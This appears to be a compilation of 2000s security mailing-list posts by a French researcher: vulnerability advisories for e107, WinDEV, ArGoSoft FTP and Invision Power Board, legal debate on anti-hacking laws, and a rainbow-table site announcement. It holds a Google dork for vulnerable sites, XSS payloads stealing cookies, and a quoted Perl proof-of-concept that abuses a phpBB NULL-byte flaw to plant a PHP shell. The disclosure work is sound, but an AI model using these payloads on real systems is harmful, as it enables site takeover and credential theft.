e107 My_Gallery Plugin Arbitrary File Download Vulnerability Release Date: 2008-03-25 Critical: Moderately critical Impact: Exposure of system information, Exposure of sensitive information Where: From remote Solution Status: Unpatched Software: My_Gallery v2.3 (plugin for e107) and prior Link: http://plugins.e107.org/e107_plugins/psilo/psilo.php?artifact.208 Description: A photo gallery for e107, powered by Highslide JS script. with random gallery menu and navigation menu. + User interface for uploads images + Pre-moderation users download + Control Panel, can edit the name and description, delete and move + New comment system, it is now the most opulent gallery + New Front page + Added BBcode and a button Vulnerability: Jerome Athias has discovered a vulnerability in My_Gallery plugin for e107, which can be exploited by malicious people to disclose sensitive information. The vulnerability is caused due to an input validation error in dload.php when processing arguments passed to the file parameter. This can be exploited to download arbitrary files from the affected system. The vulnerability is confirmed in version 2.3. Other versions may also be affected. Solution: Edit the source code to ensure that input is properly validated. Dork: inurl:e107_plugins/my_gallery Provided and/or discovered by: Jerome Athias, JA-PSI http://www.ja-psi.fr Other References: https://www.securinfos.info
Re: n.runs, Sophos, German laws, and customer safety
Hi, it is important to notice this. The mentioned german law comes after the similar french law called lcLEN (aka Fontaines's law). In 2003-2004, a petition was done against this law, with around 15,000 signatories... http://www.iris.sgdg.org/actions/len/petition.html for nothing... A new anti-security law was voted yesterday in France, this law called LEN (loi pour la confiance dans l'économie numérique): http://www.securityfocus.com/archive/1/359969 And after that we had the Guillermito's story Hacker Indicted In France For Publishing Exploits: http://slashdot.org/article.pl?sid=04/03/31/1543248 http://constitutionalcode.blogspot.com/2005/01/guillermito-reverse-engineering.html Good luck to our neighbours from Deutschland... I salute you! /JA Steven M. Christey a écrit : The n.runs-SA-2007.027 advisory claims code execution through a UPX file. This claim is inconsistent with the vendor's statement that it's only a theoretical DoS: http://www.sophos.com/support/knowledgebase/article/28407.html A corrupt UPX file causes the virus engine to crash and Sophos Anti-Virus to return 'unrecoverable error. leading to scanning being terminated. It should not be a security threat although repeated files could cause a denial of service. It is unfortunate that Germany's legal landscape prevents n.runs from providing conclusive evidence of their claim. This directly affects Sophos customers who want to know whether it's just a DoS or not. Many in the research community know about n.runs and might believe their claim, but the typical customer does not know who they are (which is one reason why I think the Pwnies were a good idea). So, many customers would be more likely to believe the vendor. If the n.runs claim is true, then many customers might be less protected than they would if German laws did not have the chilling effect they are demonstrating. It should be noted that in 2000, a veritable Who's Who of computer security - including Bruce Schneier, Gene Spafford, Matt Bishop, Elias Levy, Alan Paller, and other well-known security professionals - published a statement of concern about the Council of Europe draft treaty on Crime in Cyberspace, which I believe was the predecessor to the legal changes that have been happening in Germany: http://homes.cerias.purdue.edu/~spaf/coe/TREATY_LETTER.html Amongst many other things, this letter said: Signatory states passing legislation to implement the treaty may endanger the security of their computer systems, because computer users in those countries will not be able to adequately protect their computer systems... legislation that criminalizes security software development, distribution, and use is counter to that goal, as it would adversely impact security practitioners, researchers, and educators. If I recall correctly, we were assured by representatives that such an outcome would not occur. - Steve smime.p7s Description: S/MIME Cryptographic Signature
VNSECON07 Materials released
Hi ladies and gentlemen, I'm happy to announce the availability of my materials for my talk at VNSECON07 ( http://conf.vnsecurity.net/ ), Ho Chi Minh, Vietnam. You can find the intro and slides + the full-text paper at: https://www.securinfos.info/VNSECON2007 Covered topics: * usage, enhancement and exploit modules development for the Metasploit Framework * Speeding Up the exploits' Development prOcess, Kill and Undo: the MSF eXploit Builder The last version of the presented tool MSF eXploit Builder should be released in few days at: https://www.securinfos.info/metasploit/MSF_XB.php Best regards Take care /JA -- The UNofficial French Metasploit's website: http://www.metasploit.fr smime.p7s Description: S/MIME Cryptographic Signature
[SecurInfos] PCSoft WinDEV .wdp Project File Handling Buffer Overflow
[SecurInfos] PCSoft WinDEV .wdp Project File Handling Buffer Overflow Release Date : 2007-06-28 Critical : Moderately critical. Level 3 of 5. Impact : System access Where : From remote Solution Status : Unpatched Software : PCSoft WinDEV (PCSoft WinDEV Express) (PCSoft WinDEV Mobile) (PCSoft WebDEV) Description : Jerome Athias has reported a vulnerability in PCSoft WinDEV, which can be exploited by malicious people to compromise a user's system. The vulnerability is caused due to a boundary error within the handling of a .wdp project file that contains an overly long string in the used DLL fields. This can be exploited to cause a stack-based buffer overflow and allows arbitrary code execution when a malicious .wdp file is opened. It is also possible to perform an infinite loop (DoS), resulting in the use of a large amount of CPU and memory ressources using a malformed project file. The vulnerability has been reported in version 11 (latest release: 01F110053p). Older versions and other products (WinDEV Express, Mobile and WebDEV) could also be affected. Solutions : Do not open .wdp files from non-trusted sources. Provided and discovered by : Jerome Athias http://www.JA-PSI.fr Original Advisory : https://www.securinfos.info/english/security-advisories-alerts/20070628_PCSoft.WinDEV.wdp.Project.File.Handling.Buffer.Overflow.php PoC codes: https://www.securinfos.info/english/security-tools-hacking/windev_crash.zip smime.p7s Description: S/MIME Cryptographic Signature
Re: notepad++[v4.1]: (win32) ruby file processing buffer overflow exploit.
*Posted By:* donho *Date:* 2007-05-22 00:45 *snip *3. Fix Ruby source file buffer overflow bug. snip For further information about this project, see : http://sourceforge.net/forum/forum.php?forum_id=698183 [EMAIL PROTECTED] a écrit : Is there a fix?
Re: [fuzzing] NOT a 0day! Re: [Full-disclosure] OWASP Fuzzing page
Gadi Evron a écrit : On Tue, 12 Dec 2006, Joxean Koret wrote: Wow! That's fun! The so called Word 0 day flaw also affects OpenOffice.org! At least, 1.1.3. And, oh! Abiword does something cool with the file: This is NOT a 0day. It is a disclosed vulnerability in full-disclosure mode, on a mailing list (fuzzing mailing list). I am not sure why I got this 10 times now, I thought the days of these bounces were over. But I am tired of seeing every full-disclosure vulnerability called a 0day anymore. A 0day, whatever definition you use, is used in the wild before people are aware of it. It makes sense and I totally agree with you. But the fact is that the things change (and not allways in the right direction :-()... due to the society, money, research of popularity... Please remember us also the sense of the word hacker for instance, since nowadays it's often use to speak about bad guy/blackhat/pirate - i hope you'll agree that it's not the (our) sense /JA
Re: New Flaw in Firefox 2.0: DoS and possible remote code execution
3APA3A a écrit : Dear [EMAIL PROTECTED], NULL pointer dereference is not exploitable to code execution by itself. Hi, you should be interested by this http://metasploit.blogspot.com/2006/08/putting-fun-in-browser-fun.html + a little tool https://www.securinfos.info/outils-securite-hacking/uSEH.rar /JA
Re: Free Rainbow Tables.com
Hi, some free LM Rainbow Tables are now ready for your wget http://www.freerainbowtables.com/index-rainbowtables-tables.html Enjoy! /JA https://www.securinfos.info/english Jerome Athias a écrit : Hi there, we're proud to announce the official birth of http://www.freerainbowtables.com this website is dedicated to offer free rainbow tables (based on rainbowcrack) a complete set of MD5 tables alpha-numeric - lowercase - up to 8 characters is available for free download it's just the first project accomplished by various contributors The FreeRainbowTables Team had developped a (win32) distributed precomputation tool so if you have some CPUs available, you're invited to help us in bigger projects! Just contact the webmaster. Mirrors are welcome and spreading the tables in bitorrent-like networks also. Have a nice crack /JA https://www.securinfos.info/english
Free Rainbow Tables.com
Hi there, we're proud to announce the official birth of http://www.freerainbowtables.com this website is dedicated to offer free rainbow tables (based on rainbowcrack) a complete set of MD5 tables alpha-numeric - lowercase - up to 8 characters is available for free download it's just the first project accomplished by various contributors The FreeRainbowTables Team had developped a (win32) distributed precomputation tool so if you have some CPUs available, you're invited to help us in bigger projects! Just contact the webmaster. Mirrors are welcome and spreading the tables in bitorrent-like networks also. Have a nice crack /JA https://www.securinfos.info/english
Re: ShAnKaR: multiple PHP application poison NULL byte vulnerability
Hi,
this was also nicely described for ASP by Brett Moore
http://www.security-assessment.com/Whitepapers/0x00_vs_ASP_File_Uploads.pdf
(French translation :
https://www.securinfos.info/jerome/DOC/0x00_vs_ASP_File_Uploads_FR.pdf )
Best regards
/JA
3APA3A a écrit :
Author: ShAnKaR
Title: multiple PHP application poison NULL byte vulnerability
Applications: phpBB 2.0.21, punBB 1.2.12
Threat Level: Critical
Original advisory (in Russian): http://www.security.nnov.ru/Odocument221.html
Poison NULL byte vulnerability for perl CGI applications was described
in [1]. ShAnKaR noted, that same vulnerability also affects different
PHP applications. An example of vulnerable applications are phpBB and
punBB.
Vulnerability can be used to upload or replace arbitrary files on
server, e.g. PHP scripts, by adding poison NULL (%00) to filename.
In case of phpBB and punBB vulnerability can be exploited by changing
location of avatar file and uploading avatar file with PHP code in EXIF
data.
A PoC exploit to change Avatar file location for phpBB:
#!/usr/bin/perl -w
use HTTP::Cookies;
use LWP;
use URI::Escape;
unless(@ARGV){die USE:\n./phpbb.pl localhost.com/forum/ admin pass
images/avatars/shell.php [d(DEBUG)]\n}
my $ua = LWP::UserAgent-new(agent='Mozilla/4.0 (compatible; Windows 5.1)');
$ua-cookie_jar( HTTP::Cookies-new());
$url='http://'.$ARGV[0].'/login.php';
$data=username=.$ARGV[1].password=.$ARGV[2].login=1;
my $req = new HTTP::Request 'POST',$url;
$req-content_type('application/x-www-form-urlencoded');
$req-content($data);
my $res = $ua-request($req);
$res=$ua-get('http://'.$ARGV[0].'/login.php');
$content=$res-content;
$content=~ m/trueamp;sid=([^]+)/g;
if($ARGV[4]){
$content=$res-content;
print $content;
}
$url='http://'.$ARGV[0].'/login.php';
$data=username=.$ARGV[1].password=.$ARGV[2].login=1admin=1;
$req = new HTTP::Request 'POST',$url;
$req-content_type('application/x-www-form-urlencoded');
$req-content($data);
$res = $ua-request($req);
$url='http://'.$ARGV[0].'/admin/admin_board.php?sid='.$1;
$data=submit=submitallow_avatar_local=1avatar_path=.$ARGV[3].%00;
$req = new HTTP::Request 'POST',$url;
$req-content_type('application/x-www-form-urlencoded');
$req-content($data);
$res = $ua-request($req);
if($ARGV[4]){
$content=$res-content;
print $content;
}
References:
[1] .rain.forest.puppy, Perl CGI problems, Phrack Magazine Issue 55
Old vulnerable sotwares collection
Hi, it's often difficult to find old versions of vulnerable softwares it's usefull to have these old versions to test an exploit, study a vulnerability or doing a patch analysis... it's also usefull to test a fuzzer, a scanner... for a course or a challenge... so i think about to build a little reposiroty with old versions of little softwares (free or trial) if interested or could help, please visit this page: https://www.securinfos.info/old_softwares_vulnerable.php Cheers /JA
Re: ArGoSoft FTP server remote heap overflow
Hi, as i replied privately to you, yes i think we can say that. You could consider it as an update... Note that the vendor was contacted without response. Regards /JA Steven M. Christey a écrit : A buffer overflow in DELE was originally reported to Bugtraq by CorryL in March 2005, for ArGoSoft FTP 1.4.2.8 (CVE-2005-0696): http://www.securityfocus.com/archive/1/392653 According to CorryL's disclosure timeline, no patch had been released by the disclosure date. So, is this a rediscovery of that older issue, for the most recent version? - Steve
ArGoSoft FTP server remote heap overflow
-- Title: ArGoSoft FTP server remote heap overflow -- Affected Products: ArGoSoft FTP server 1.4.3.5 (current) and prior -- Affected Vendor: ArGoSoft - http://www.argosoft.com -- Impact: DoS, Arbitrary Code Execution -- Where: From remote -- Type: Heap Overflow -- Vulnerability Details: A remote attacker with valid credentials is able to trigger a heap overwrite in ArgoSoft FTP server. The bug occurs by providing a long argument to the DELE command. This vulnerability can allow remote attackers to execute arbitrary code or launch a denial of service attack. -- Credit: SecurInfos https://www.securinfos.info/english/
Invision Power Board 2.1 : Multiple XSS Vulnerabilities
Fast translation of benji's advisory *** Author : benjilenoob WebSite : http://benji.redkod.org/ and http://www.redkod.org/ Audit in pdf : http://benji.redkod.org/audits/ipb.2.1.pdf Product : Invision power board Version : 2.1 Tisk : Low. XSS I- XSS non critical: 1.Input passed to the $address variable isn't properly verified in the administrative section. This can be exploited by providing a valid login, and javascript code in the variable. The code will be executed in a user's browser session in context of an affected site. PoC: http://localhost/2p1p0b3/upload/admin.php?adsess=[xss]act=logincode=login-complete This could be exploited to steal cookie information. 2. Input passed to the ACP Notes textarea field in the administrative section isn't properly verified. This can be exploited to insert javascript code in the notes. The code will be executed in a user's browser session in context of an affected site. PoC: /textarea'/scriptalert(document.cookie)/script 3.Input passed to the Member's Log In User Name, Member's Display Name, Email Address contains..., IP Address contains..., AIM name contains..., ICQ Number contains..., Yahoo! Identity contains..., Signature contains..., Less than n posts, Registered Between (MM-DD-), Last Post Between (MM-DD-) and Last Active Between (MM-DD-) members profiles parameters in the administrative section isn't properly verified. This can be exploited to insert javascript code. 4. Non-permanent XSS: http://localhost/2p1p0b3/upload/admin.php?adsess=[id]section=contentact=forumcode=newname=[xss] 5. Non-permanent XSS after administrative login: http://localhost/2p1p0b3/upload/admin.php?name=[xss]description=[xss] 6.Input passed to the description field of a Component in the Components section of the administrative section isn't properly verified. This can be exploited to insert javascript code. PoC: /textarea'/scriptalert()/script 7. Input passed to the Member Name, Password, Email Address fields of a new member's profile in the administrative section isn't properly verified. This can be exploited to insert javascript code. 8. Input passed to the Group Icon Image field of a new Group in the administrative section isn't properly verified. This can be exploited to insert javascript code. 9. Input passed to the Calendar: Title of a new Calendar in the administrative section isn't properly verified. This can be exploited to insert javascript code. Benji Team RedKod http://www.redkod.org/ *** Regards, /JA http://www.securinfos.info smime.p7s Description: S/MIME Cryptographic Signature
